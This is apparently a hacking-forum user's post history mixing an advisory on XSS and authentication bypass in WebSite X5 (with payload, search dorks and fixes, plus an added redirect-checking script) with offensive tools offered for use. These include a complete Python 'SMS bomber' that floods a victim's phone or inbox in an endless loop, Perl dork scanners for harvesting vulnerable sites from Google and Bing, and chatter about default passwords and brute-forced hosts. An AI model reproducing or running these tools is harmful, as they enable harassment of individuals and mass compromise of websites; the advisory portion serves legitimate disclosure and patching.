Everything posted by Htich
-
=========================================
Vulnerable Software: Incomedia WebSite X5 Evolution <= 9.0.4.1748 (All versions)
Vendor: www.websitex5.com
Vulns: XSS && Auth Bypass
Software License: Commercial
Dork 1: inurl:imsearch.php
Dork 2: intitle:WebSite X5 Manager inurl:/admin/header.php
=========================================
About Software:
==========================================
WebSite X5 Evolution 9 is the most versatile and complete solution you'll find for creating eye-catching, functional and professional websites, blogs and online stores. You'll be surprised at how easy WebSite X5 Evolution 9 is to use, but what is perhaps most amazing is the sheer power and totality of the features it offers.
http://www.websitex5.com/en/evolution-9.html
*Nice Software and easy to use.*
==========================================
About Vulnerabilities:
[*] XSS:
[*] site.tld/imsearch.php?search="\><script>alert(1);</script>
Fix: Open imsearch.php and find:
=============VULNERABLE CODE==============
<?php
$search = new imSearch();
$search->search(@$_GET['search'], @$_GET['page']);
?>
==========END OF VULNERABLE CODE==========
REPLACE WITH:
==============FIXED CODE====================
<?php
$search = new imSearch();
$search->search(@htmlspecialchars($_GET['search']), htmlspecialchars(@$_GET['page']));
?>
===========END OF FIXED CODE================
[*] Second vulnerability is Authentication Bypass.
[*] Vulnerable code: site.tld/admin/checkaccess.php
========= BEGIN VULNERABLE CODE ===========
<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
    if (basename($_SERVER['HTTP_REFERER']) == "login.php")
        header("Location: login.php?error");
    else
        header("Location: login.php");
} else
    $logged = TRUE;
// End of file checkaccess.php
==========END OF VULNERABLE CODE==========
Notice flaw: Script continues execution.
To reproduce:
===============================================
Using Fiddler, intercept the traffic from your browser and you will get the output from the script's execution.
Print screen: http://oi47.tinypic.com/f21sf7.jpg
==================== RAW=======================
HTTP/1.1 302 Found
Date: Sun, 25 Nov 2012 01:13:19 GMT
Server: Apache
Set-Cookie: ASPX=pfsnkn5ccps9u15pa0r4of6lodesg6lq; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: login.php
Content-Length: 1188
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it" dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Language" content="it" />
<meta http-equiv="Content-Type-Script" content="text/javascript" />
<meta http-equiv="ImageToolbar" content="False" />
<meta name="MSSmartTagsPreventParsing" content="True" />
<script type="text/javascript" src="../res/jquery.js"></script>
<script type="text/javascript" src="../res/x5engine.js"></script>
<link rel="stylesheet" type="text/css" href="template.css" media="screen" />
<title>WebSite X5 Manager</title>
</head>
<body>
<div id="imAdminPage">
<div id="imBody">
<div class="imSectionTitle"></div>
<div class="imContent">
<div class="imTest pass">?????? PHP: 5.2.17<span>PASS</span></div>
<div class="imTest pass">????????? ??????<span>PASS</span></div>
<div class="imTest pass">???? ? ????????? ????? ?? ???????<span>PASS</span></div>
</div>
</div>
</div>
</body>
===============EOF RAW==================
If your checkaccess.php isn't patched, every file in /admin/*.php is vulnerable.
Fixed Code: site.tld/admin/checkaccess.php
==============BEGIN FIXED CODE=================
<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
    if (basename($_SERVER['HTTP_REFERER']) == "login.php") {
        header("Location: login.php?error");
        exit;
    } else {
        header("Location: login.php");
        exit;
    }
} else {
    $logged = TRUE;
}
// End of file checkaccess.php
===============END OF FIXED CODE================
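The auth bypass above comes from a redirect header() that is not followed by exit, so the rest of the admin page still runs and is sent after the 302. As an added example (not from the advisory or the vendor), here is a small Python check that flags header("Location: ...") calls with no exit/die on the same line or as the next statement; the REDIRECT/TERMINATOR patterns and unterminated_redirects() are the example's own, and the two PHP samples are constructed from the vulnerable and fixed checkaccess.php in the post.

```python
import re

# Constructed samples, copied from the vulnerable and fixed checkaccess.php in the post above.
VULNERABLE = r'''<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
    if (basename($_SERVER['HTTP_REFERER']) == "login.php")
        header("Location: login.php?error");
    else
        header("Location: login.php");
} else
    $logged = TRUE;
'''

FIXED = r'''<?php
require_once("../res/x5engine.php");
$login = new imPrivateArea();
if ($login->checkAccess("admin/" . basename($_SERVER['PHP_SELF'])) !== 0) {
    if (basename($_SERVER['HTTP_REFERER']) == "login.php") {
        header("Location: login.php?error");
        exit;
    } else {
        header("Location: login.php");
        exit;
    }
} else {
    $logged = TRUE;
}
'''

# A redirect header, and the statements that actually stop execution after it.
REDIRECT = re.compile(r'header\s*\(\s*["\']Location:', re.IGNORECASE)
TERMINATOR = re.compile(r'\b(exit|die)\b\s*(\(|;)', re.IGNORECASE)


def unterminated_redirects(php_source):
    """Return 1-based line numbers of header("Location: ...") calls not followed by exit/die."""
    lines = php_source.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        match = REDIRECT.search(line)
        if not match:
            continue
        if TERMINATOR.search(line[match.end():]):
            continue  # header(...); exit; on the same line
        following = [l.strip() for l in lines[idx + 1:] if l.strip()]
        if following and TERMINATOR.match(following[0]):
            continue  # exit/die is the very next statement
        findings.append(idx + 1)  # script keeps running after the redirect
    return findings
```

Running it over the two samples flags lines 6 and 8 of the vulnerable file and nothing in the fixed one; it is a line-based heuristic, not a PHP parser, so it only sees the next non-blank statement.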
-
...We know what to invest $ in, and we know how many villas we'll build off them!
-
.... Admin / 123456 ... that's how it goes for all of them! A "README" for people slow on brain...!
-
1) As far as I know, for every PayPal payment method you need to have the card attached (or some card). 2) Out of 10 sites found, if 6 have that "bug", you'll make a cartload of money. 2.1) Google will detect the "bug" and, luckily for you, will pay you. 2.2) You can sell that bug for $ to people interested in that bug. 3) If not, good for you. 4) The END!
-
"So We are back in business" ?
-
1) You use the source in Python. 2) You need a Gmail account, or change the SMTP server (login, pass, IP). Let me know if you succeeded!
-
danyweb09: As I said.. on Google the search engine gets banned very quickly.. pinkpanter: I hope that source helps you!
-
paikpanter @ As far as I know, Google bans "search engines" very quickly, Bing doesn't! OFF: Manual command -> https://www.google.com/search?q=%22php?id%22&num=100&filter=0&start=%22.$i%29; }
sub google() {
    my @list;
    my $key = $_[0];
    for (my $i=0; $i<=1000; $i+=100){
        my $search = ("http://www.google.com/search?q=".uri_escape($key)."&num=100&filter=0&start=".$i);
        my $res = &search_engine_query($search);
        while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
            my $link = $1;
            if ($link !~ /google/){
                my @grep = &links($link);
                push(@list,@grep);
            }
        }
    }
    return @list;
}
-
Price.. anything? You sell, you sell... but for what? Eggs, milk?
-
# Name: smsbomber.py
# Coded by Cody from r00tsecurity.org
# Released exclusively to r00tsecurity.org
# Feel free to repost, leave credit intact.
import smtplib as s
print"\n\r\n\rCody's SMS Bomber \n\r"
print"\n\r\n\rPlease login with your Gmail account \n\r"
username = raw_input("Gmail Username: ")
password = raw_input("Gmail Password: ")
obj = s.SMTP("smtp.gmail.com:587")
obj.starttls()
obj.login(username, password)
print"\n\r"
print """
What kind of bomb would you like to send?
1. SMS
2. Email
"""
option = input()
print("\n\r")
if option == 1:
    carrier_attack = 0
    print """
    What is their carrier? Respond with the corresponding number
    1. Alltel
    2. AT&T
    3. Rogers
    4. Sprint
    5. T-Mobile
    6. Telus
    7. Verizon
    8. Virgin Mobile
    9. Orange
    \n\r
    """
    carrier = input()
    if carrier == 1: carrier_attack = "@alltelmessage.com"
    if carrier == 2: carrier_attack = "@txt.att.net"
    if carrier == 3: carrier_attack = "@pcs.rogers.com"
    if carrier == 4: carrier_attack = "@messaging.sprintpcs.com"
    if carrier == 5: carrier_attack = "@tmomail.net"
    if carrier == 6: carrier_attack = "@msg.telus.com"
    if carrier == 7: carrier_attack = "@vtext.com"
    if carrier == 8: carrier_attack = "@vmobl.com"
    if carrier == 9: carrier_attack = "@sms.orange.pl"
    v_phone = raw_input("Phone Number: ") + str(carrier_attack)
    message = raw_input("Message: ")
    phone_message = ("From: %s\r\nTo: %s \r\n\r\n %s" % (username, "" .join(v_phone), "" .join(message)))
    while 1:
        obj.sendmail(username, v_phone, phone_message)
        print "Message sent! Sending another.. Press Ctrl + C to stop."
if option == 2:
    v_email = raw_input("Email: ")
    message = raw_input("Message: ")
    email_message = (" \r\n\r\n From: %s\r\n To: %s\r\n\r\n %s" % (username, "" .join(v_email), "" .join(message)))
    while 1:
        obj.sendmail(username, v_email, email_message)
        print "Message sent! Sending another.. Press Ctrl + C to stop."
-
I've gotten this far -> [image: untitled], further on... I don't know how to get past it... no idea how to find the answer..
-
)))))))))) EPiC! +)))))))))))) OFF: Welcome to the "Jungle"
-
(Pastebin.com link) Hope it's useful to you.
------------------------------
#!/usr/bin/perl -w
#Dork Scann
#By
#cPanel
use LWP::UserAgent;
print q{
+----------------------[Dork Scan]----------------------+
|                                                       |
|                       By cPanel                       |
|                          v2                           |
+-------------------------------------------------------+
};
print "\nColoque Sua Dork:";
print "\n(Ex: inurl:home.php?id= )\n";
print "=>";
$dork = <STDIN>;
chomp($dork);
print "Scan Start!";
for ($i = 0; $i < 1000; $i += 10) {
    $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
    $b->timeout(30);
    $b->env_proxy;
    $c = $b->get('http://www.bing.com/search?q=' . $dork . '&first=' . $i . '&FORM=PERE')->content;
    $check = index($c, 'sb_pagN');
    while (1) {
        $n = index($c, '<h3><a href="');
        if ($n == -1) { last; }
        print "$s\n";
        $c = substr($c, $n + 13);
        $s = substr($c, 0, index($c, '"'));
        open (txt,">>done.txt");
        print txt $s,"\n";
        close(txt);
    }
    if ($check == -1) { last; }
}
print "Scan Finalizado!";
system("done.txt");
exit;
-
When you're in trouble, the only person who will support you morally/financially will be mom/dad, or more precisely that friend you didn't think cared about you/your situation.
-
Is it just me, or does the link not work so I can see it?
-
wElCome To The DarkSide We Have AOL & LINUX!
-
Anyway, from what I've read in general about Bitcoin.. if you have some 10-20 i7 computers (a beast + graphics card and whatever else it needs) you can easily get to 1k/month.
-
Warm, warm... but only 2 out of 10 work when tested.. anyway gj! What did you scan them with, hscan, or did you bruteforce them?
-
Oh my life... it's the longest "poem I've ever read"... Luceafarul is small.
-
Icode: what do you have against the guy, he's also trying to make some posts which for some people are useful or not! P